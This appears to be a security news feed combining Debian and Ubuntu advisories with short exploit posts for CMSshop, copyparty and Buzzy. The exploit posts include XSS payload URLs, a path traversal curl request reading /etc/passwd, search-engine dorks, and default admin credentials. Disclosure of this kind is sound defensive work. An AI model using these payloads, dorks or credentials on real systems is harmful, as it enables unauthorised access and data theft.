Debian Linux Security Advisory 5462-1 - Tavis Ormandy discovered that under specific microarchitectural circumstances, a vector register in AMD "Zen 2" CPUs may not be written to 0 correctly. This flaw allows an attacker to leak sensitive information across concurrent processes, hyper threads and virtualized guests.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5462-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
July 30, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2023-20593

Tavis Ormandy discovered that under specific microarchitectural  
circumstances, a vector register in AMD "Zen 2" CPUs may not be  
written to 0 correctly.  This flaw allows an attacker to leak  
sensitive information across concurrent processes, hyper threads  
and virtualized guests.

For details please refer to  
<https://lock.cmpxchg8b.com/zenbleed.html> and  
<https://github.com/google/security-research/security/advisories/GHSA-v6wh-rxpg-cmm8>.

This issue can also be mitigated by a microcode update through the  
amd64-microcode package or a system firmware (BIOS/UEFI) update.  
However, the initial microcode release by AMD only provides  
updates for second generation EPYC CPUs.  Various Ryzen CPUs are  
also affected, but no updates are available yet.

For the stable distribution (bookworm), this problem has been fixed in  
version 6.1.38-2.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmTGCyRfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Tjjw//SsbN4RnQHqV1G0XVWxApVK1DYoKw6+tHxkkf301jV2abDMcIO1keVNol  
gc2yENQyzeoGd++eBqO0MD9GnvrbutT6n7wChuyvB7bzFDQQA6hJHLcFLkKYA3D1  
6yFgczWL0Tx7wcrpKU9gVMWAe928VE4hJGVd6nFF02YS0GF8voY/ymiCqbuQA05f  
LOmeHNIWyzulBG0qNwQE6HT6s6LkLMCZAawpe3D85cE6exFWRDKJhxKY8GcZvJDV  
8G80Ik1xYAQ6Q5HqwxUr2Rp0sN7a8SghF817Sn/Bx6ahvej61ZTgDn7QhKLkGwu2  
/DOnMcKwKd9WB7gS9T4YLd6rNOPCL4J5P06ia4/JbocExIu19pEEfQvb7gf5PVl3  
994DykFy9ByKiXYh91U9QNyKaBZSjMFeN9Mg8FbbuwZGLLNACkhZc72JK4yKsxTq  
5cucuVBzwbwvvrK63h3YVDyOv8vRiI/jquxOMehsrSGOuaHpd2VduQdnS0ayKjqX  
STOKNRMA+GGjIoNdLyfe9HDlm3ztwsjrxoO0eXqWjUc7EA6KOfsF7NLFju2YXEt9  
80Yr6kCS5/IukkhZBAP4GwV4mLKG1yZ7vzwb15pAihvtw7UFrrzifkcL0yPf7Cx8  
wVtTUdl+5Y4Dfy+i9/LT0sY4fVEKfZZoXnDV733vxTTKKNQSpFk=  
=ceVi  
-----END PGP SIGNATURE-----

Debian Security Advisory 5462-1

Debian Linux Security Advisory 5461-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5461-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
July 30, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2023-3390 CVE-2023-3610 CVE-2023-20593

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

CVE-2023-3390

    A use-after-free flaw in the netfilter subsystem caused by incorrect  
    error path handling may result in denial of service or privilege  
    escalation.

CVE-2023-3610

    A use-after-free flaw in the netfilter subsystem caused by incorrect  
    refcount handling on the table and chain destroy path may result in  
    denial of service or privilege escalation.

CVE-2023-20593

    Tavis Ormandy discovered that under specific microarchitectural  
    circumstances, a vector register in AMD "Zen 2" CPUs may not be  
    written to 0 correctly.  This flaw allows an attacker to leak  
    sensitive information across concurrent processes, hyper threads  
    and virtualized guests.

    For details please refer to  
    <https://lock.cmpxchg8b.com/zenbleed.html> and  
    <https://github.com/google/security-research/security/advisories/GHSA-v6wh-rxpg-cmm8>.

    This issue can also be mitigated by a microcode update through the  
    amd64-microcode package or a system firmware (BIOS/UEFI) update.  
    However, the initial microcode release by AMD only provides  
    updates for second generation EPYC CPUs.  Various Ryzen CPUs are  
    also affected, but no updates are available yet.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 5.10.179-3.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmTGCxhfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Q2Lw//W7eGT2uTxzgwGK1ivLNtzu4VnZfX3luCzLc2Gy49YhSTPfepMsR+EZWU  
zMfxMwXp7HcgUUAj6VnKPSYt0lmauDVy9POUl20nOzM8hFScemhFJ+DVSeeJrfhR  
RPUroaJNLpJS1QjYJisi2tjKnoc8IhCkw/X88I4S4dAzekmRTLeEdeAIP0jyRYDi  
Pd+nW8vR2bcMG4jAaA/lBu17FgysEpHMleMzr9Ocw7k6eqlcIo12w36Ml51MmXZW  
Lxr7XKrAM6p9TuL+BY0i4FvW0f7hvbpMdhIaAzUf+7LQj9Tn5rGNaHB+NhLO6HB1  
spOXfZLVCM10LDCDIUR3lz0hUNI/10bKtoarbvoygevVzuvGWLTmI5P/uei9Bv1m  
jqd+FOtkZuYsuQzvzIrVISGL2ltpD3055mBaOJWIBrDl+mrR88m+LAMA5iJiCuvh  
M6rfJgraQFHeMFJi1ojDgNyyRaasxOKXRcWAYOvgZ1XKLfJ10OkieYq5CO1c7iKW  
4NkwBklDP8wEHoZHMEY3KnLnGcNO93wBBGcQVIBlMXu0IKlf/BT0Rcj0ynz5g5N1  
MgvGAJio+yTr4QWRz/GQRtF3Lf5r4Ezib/Y2Qv9PUbVWzmmiUyQsATjcp9d+sLSB  
hJhR9+9d4DefRAPGFOSCA6d01qL8HygsvKyyGB4C1DdbSlT3APc=  
=3UcB  
-----END PGP SIGNATURE-----

Debian Security Advisory 5461-1

CMSshop version 1 suffers from a cross site scripting vulnerability.

**CMSshop 1 Cross Site Scripting**

Posted Jul 31, 2023

Authored by indoushka

CMSshop version 1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 987e4a7e0d2984ae1bf6c18eb68c0343d8d4d8903869ab00d311e71710917c70

Download | Favorite | View

**CMSshop 1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : CMSshop(ir) v1 XSS Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : https://codecanyon.net/item/pro-login-advanced-secure-php-user-management-system/12388905?s_rank=169               || # Dork      : "Login - ProLogin"                                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /shop-php/cart.php?new=28%22%20onmouseover%3dprompt(904251)%20bad%3d%22                   /shop-php/product.php?productid=20&start=0%22%20onmouseover%3dprompt(961299)%20bad%3d%22            [+] http://localhost/shop-php/cart.php?new=21%22%20%3Cmarquee%3E%3Cfont%20color=Blue%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E%22Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,806)
*   Arbitrary (16,170)
*   BBS (2,859)
*   Bypass (1,736)
*   CGI (1,026)
*   Code Execution (7,254)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,336)
*   DoS (23,386)
*   Encryption (2,366)
*   Exploit (51,705)
*   File Inclusion (4,218)
*   File Upload (969)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (891)
*   Java (3,038)
*   JavaScript (853)
*   Kernel (6,658)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,666)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,587)
*   Python (1,531)
*   Remote (30,698)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,879)
*   Shell (3,177)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,329)
*   TCP (2,399)
*   Trojan (687)
*   UDP (886)
*   Virus (664)
*   Vulnerability (31,731)
*   Web (9,628)
*   Whitepaper (3,748)
*   x86 (962)
*   XSS (17,889)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,301)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,624)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,782)
*   UNIX (9,272)
*   UnixWare (186)
*   Windows (6,566)
*   Other

CMSshop 1 Cross Site Scripting

Copyparty version 1.8.2 suffers from a directory traversal vulnerability.

    # Exploit Title: copyparty 1.8.2 - Directory Traversal# Date: 14/07/2023# Exploit Author: Vartamtzidis Theodoros (@TheHackyDog)# Vendor Homepage: https://github.com/9001/copyparty/# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.2# Version: <=1.8.2# Tested on: Debian Linux# CVE : CVE-2023-37474#DescriptionCopyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory.#POCcurl -i -s -k -X  GET 'http://127.0.0.1:3923/.cpr/%2Fetc%2Fpasswd'

Copyparty 1.8.2 Directory Traversal

Copyparty version 1.8.6 suffers from a cross site scripting vulnerability.

    # Exploit Title: copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)# Date: 23/07/2023# Exploit Author: Vartamtezidis Theodoros (@TheHackyDog)# Vendor Homepage: https://github.com/9001/copyparty/# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.6# Version: <=1.8.6# Tested on: Debian Linux# CVE : CVE-2023-38501#DescriptionCopyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack. Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.#POChttps://localhost:3923/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(1)%3E

Copyparty 1.8.6 Cross Site Scripting

Debian Linux Security Advisory 5460-1 - It was discovered that Curl performed incorrect file path handling when saving cookies to files, which could lead to the creation or overwriting of files.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5460-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
July 26, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : curl  
CVE ID         : CVE-2023-32001

It was discovered that Curl performed incorrect file path handling when  
saving cookies to files, which could lead to the creation or overwriting  
of files.

The oldstable distribution (bullseye) is not affected.

For the stable distribution (bookworm), this problem has been fixed in  
version 7.88.1-10+deb12u1.

We recommend that you upgrade your curl packages.

For the detailed security status of curl please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/curl

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTBdbYACgkQEMKTtsN8  
TjbfTBAAmujUmVYytNJLsiCxp0HhaIEblUWK5kI5g0J2zNqIYvc3XZ92Zy64jiIn  
3Iwm8qptjSY0JfhQK22X8gKOWtUfjmFiiPNZuvtIn09/9VXKq2c0U+h/uht2gTx4  
VaEwFOux8nJHesXDZkWAbfuVlt8trSnfRisEJiaHOggjCz3MZZ/Zhc/FeSgR7cTx  
+udiMlseaqcjtDG0P9S7PLvG8Jf4w/jtG1kFzRvzJbJYczAwQ67wAJi5lmsbdK00  
txg6Eljmf7JkaYhi0z2pi8w7KbIRhygzkTa97rM0i4BupOO3IcLV0TiosMSRdcXr  
Zij0ndo8WIiS5FtOR32bi5Du35uh0HufGtvaL97vyxglKv7IjbPVLRntLMNwTyrM  
VXt4Hy/FHZPUkpNxqurfQwK+I++QUj0Sd3p5AJPD8/DHipP6ffMNPpb3oARBrsev  
uuGmk3tKW3NcTaYQGPo76QhXAc2R/9szMjQYOj/0T07xElYYWU+BBh44W9rIuQZY  
+dssf/X3GXzub9NPJSKrYZoCloT+U7JhqIi+D5GidXeZP2DXBdQMWrX2y6T1t0S0  
pN7fjknB+jnbMRrjpqntzJ52x0lT3b8m7IjrG7yLA3moUPrDO7lzlneN1wptJ5sw  
qFeAvOu3UehQy6HYEz44Xafk7sIl15LgNZRPZpJQK4u+1xtjI+E=JrDz  
-----END PGP SIGNATURE-----

Debian Security Advisory 5460-1

Buzzy News Viral Lists Polls and Videos version 2.5.1 appears to leave default credentials installed after installation.

**Buzzy News Viral Lists Polls And Videos 2.5.1 Insecure Settings**

Posted Jul 27, 2023

Authored by indoushka

Buzzy News Viral Lists Polls and Videos version 2.5.1 appears to leave default credentials installed after installation.

tags | exploit

SHA-256 | 5ed91b51bdf7efaa67ae9bf7fba6a1066c2ab71217d47b8a8ad0b9d7d469dbaa

Download | Favorite | View

**Buzzy News Viral Lists Polls And Videos 2.5.1 Insecure Settings**

    ======================================================================================================================================| # Title     : Buzzy - News Viral Lists Polls and Videos V 2.5.1 Insecure Settings Vulnerability                                    || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                              || # Vendor    : https://codecanyon.net/item/buzzy-news-viral-lists-polls-and-videos/13300279?s_rank=4                                |  | # Dork      : "buzzy /profile/admin/ Copyright © Buzzy. All rights reserved."                                                      |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  appears to leave default credentials installed after installation.[+]  Use Admin : admin@admin.com & Pass : admin[+]  http://127.0.0.1/clickhungamacom/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,789)
*   Arbitrary (16,166)
*   BBS (2,859)
*   Bypass (1,736)
*   CGI (1,025)
*   Code Execution (7,248)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,336)
*   DoS (23,383)
*   Encryption (2,365)
*   Exploit (51,681)
*   File Inclusion (4,215)
*   File Upload (969)
*   Firewall (821)
*   Info Disclosure (2,758)
*   Intrusion Detection (891)
*   Java (3,037)
*   JavaScript (851)
*   Kernel (6,656)
*   Local (14,442)
*   Magazine (586)
*   Overflow (12,666)
*   Perl (1,423)
*   PHP (5,140)
*   Proof of Concept (2,338)
*   Protocol (3,584)
*   Python (1,531)
*   Remote (30,691)
*   Root (3,577)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,878)
*   Shell (3,177)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,324)
*   TCP (2,398)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,727)
*   Web (9,624)
*   Whitepaper (3,748)
*   x86 (962)
*   XSS (17,882)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,797)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,284)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,612)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,780)
*   UNIX (9,271)
*   UnixWare (186)
*   Windows (6,565)
*   Other

Buzzy News Viral Lists Polls And Videos 2.5.1 Insecure Settings

Debian Linux Security Advisory 5459-1 - Tavis Ormandy discovered that under specific microarchitectural circumstances, a vector register in "Zen 2" CPUs may not be written to 0 correctly. This flaw allows an attacker to leak register contents across concurrent processes, hyper threads and virtualized guests.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5459-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
July 25, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : amd64-microcode  
CVE ID         : CVE-2023-20593  
Debian Bug     : 1041863

Tavis Ormandy discovered that under specific microarchitectural  
circumstances, a vector register in "Zen 2" CPUs may not be written to 0  
correctly. This flaw allows an attacker to leak register contents across  
concurrent processes, hyper threads and virtualized guests.

For details please refer to  
https://lock.cmpxchg8b.com/zenbleed.html  
https://github.com/google/security-research/security/advisories/GHSA-v6wh-rxpg-cmm8

The initial microcode release by AMD only provides updates for second  
generation EPYC CPUs: Various Ryzen CPUs are also affected, but no  
updates are available yet. Fixes will be provided in a later update once  
they are released.

For more specific details and target dates please refer to the AMD  
advisory at  
https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7008.html

For the oldstable distribution (bullseye), this problem has been fixed  
in version 3.20230719.1~deb11u1. Additionally the update contains a fix  
for CVE-2019-9836.

For the stable distribution (bookworm), this problem has been fixed in  
version 3.20230719.1~deb12u1.  
We recommend that you upgrade your amd64-microcode packages.

For the detailed security status of amd64-microcode please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/amd64-microcode

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmTAOR1fFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Rncg/9Hl5y0YP0GpLU0RtfWXOKZw/TLqJ2Ia5Xn29IYZ+SQfBgS1nqpX+J9xQP  
y4x8DvjRacj30IhC2wkaczkNm8FvbIiqedraVrUj9ZMmVWoQohIZWrsnwuWbZRlz  
Dium6J+tFXG3azP/1rAc1bZAd0kUnc8r6jmOpluh5KpQf1+KqRUWQuVopG1N9SZC  
FC7nAMhLE9E2/dITj2i4InP0CG/+uqlJO5S9rGfKaPHpTK2vjDzJr3yWGQ4yS/so  
mc+l9nkHb2+UEEHDQ9HMN7A5AuYPk1vU49YOQ+FsgdFamhpchTrf/JbljCtg0WpZ  
JFok1N1MizHxXQ0S5UdFYaFV//4yW7gPhnlq5hAr4G2czAaOEOZWfzNN+dRJGtvq  
DNQd/B08ZqlTxEqNWZS5I3YOgITUm0pUYXPqneZsdOlMJD4/qkXn9WT6a9zo3yMU  
sumxBGgaXMTV68K7qzFQTVYBMJt2vO3e8JThMClU/MRUe1lfwyCMVawsmtxrHtr0  
zF/7NUZteXND9vD1fmY6b0V9Owerms9PitPmlahi3++PX3RvXcrZxC7HXFKGmEva  
nYapN0Kl4TvkWhpGoZHANsjHdyle4q/DrhgEv331IA+btTVSbiesKBZhTIfdmM2G  
IsaZXtP2GL6igyrPBV09Sm6YheVMc3FiENs7tTpBqyQIoARTZUQ=  
=WvUu  
-----END PGP SIGNATURE-----

Debian Security Advisory 5459-1

Debian Linux Security Advisory 5458-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in bypass of sandbox restrictions, information disclosure, reduced cryptographic strength of the AES implementation, directory traversal or denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5458-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJuly 25, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : openjdk-17CVE ID         : CVE-2023-22006 CVE-2023-22036 CVE-2023-22041 CVE-2023-22044                  CVE-2023-22045 CVE-2023-22049Several vulnerabilities have been discovered in the OpenJDK Java runtime,which may result in bypass of sandbox restrictions, informationdisclosure, reduced cryptographic strength of the AES implementation,directory traversal or denial of service.For the oldstable distribution (bullseye) additional build dependenciesneed to be backported, a fixed package will be provided when these areready as 17.0.8+7-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 17.0.8+7-1~deb12u1.We recommend that you upgrade your openjdk-17 packages.For the detailed security status of openjdk-17 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/openjdk-17Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTAGOoACgkQEMKTtsN8Tjb8nRAAvq9DlNtduOec61Hw9i0O8plyHPvMGuz7iG9usczk95ENCOfasp/VbIF4pqCSnwVwbSF02vSiodXETzjiK9+qHYHGiXCQ8j0U/Tiav5/wcx9O9h1CIhcuEsMp7pULUjSq52kh3wbTf7/UU8ogiSTxjZ6GY6wrEJJC6GnjKc3SAyc/D1uo85mG2ubkkD/G1w9V0egcCiopo/DejU/zzrTMc0/SiG3xksA8cmCICu0R2hvY6vLASZ42qwO3DYtWEQE4imDsUhhw3fXOs4zxT5mbLVZd2wO8+S7LY3y6uiEXL44inYHugljnG/0kea3NjiUPIm0ffdaq9DMYfoGHvho5tiFTMF5Y9p7Llhl0mZ13B2IS+tyADBuJhTmcp4JaB0Ls95w6ZU9LCMLIN9TBjBOK2r0i25oiNmgxlvg/ZJ3+S3L6oUypAFLYokNxvFCt/04mWsVdYZir32zD7sZ2jqk0ehqF6aMLPBqvLc/ic89oZXg+mcsXdB54wsnAorLo5H5ZN5P6yEJ9tILFlOPanUewZCr8oWmJkTe8ogYEQIkUkryXxD5GF3lAfpxsbmLKNvFe5sWloXJEvCm9CzBkmoJtAsgAyNY5O2gQwEG6gna6t5sKN0cYK5+LXK8fPWSkXLDYqgUSVeJGL+V0aU2wE5qTfovbv8nH30IoEB6kSBofv+k==Fjqe-----END PGP SIGNATURE-----

Debian Security Advisory 5458-1

Ubuntu Security Notice 6243-1 - It was discovered that Graphite-Web incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to perform server-side request forgery and obtain sensitive information. This issue only affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. It was discovered that Graphite-Web incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to perform cross site scripting and obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6243-1  
July 25, 2023

graphite-web vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in Graphite-Web.

Software Description:  
- graphite-web: A highly scalable real-time graphing system

Details:

It was discovered that Graphite-Web incorrectly handled certain inputs. If a  
user or an automated system were tricked into opening a specially crafted  
input file, a remote attacker could possibly use this issue to perform  
server-side request forgery and obtain sensitive information. This issue  
only affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. (CVE-2017-18638)

It was discovered that Graphite-Web incorrectly handled certain inputs. If a  
user or an automated system were tricked into opening a specially crafted  
input file, a remote attacker could possibly use this issue to perform  
cross site scripting and obtain sensitive information. (CVE-2022-4728,  
CVE-2022-4729, CVE-2022-4730)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   graphite-web                    1.1.8-1ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
   graphite-web                    1.1.4-5ubuntu0.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   graphite-web                    1.0.2+debian-2ubuntu0.1~esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   graphite-web                    0.9.15+debian-1ubuntu0.1~esm1

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   graphite-web                    0.9.12+debian-3ubuntu0.1~esm2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6243-1  
   CVE-2017-18638, CVE-2022-4728, CVE-2022-4729, CVE-2022-4730

Package Information:  
   https://launchpad.net/ubuntu/+source/graphite-web/1.1.8-1ubuntu0.22.04.1  
   https://launchpad.net/ubuntu/+source/graphite-web/1.1.4-5ubuntu0.1

Tag

#debian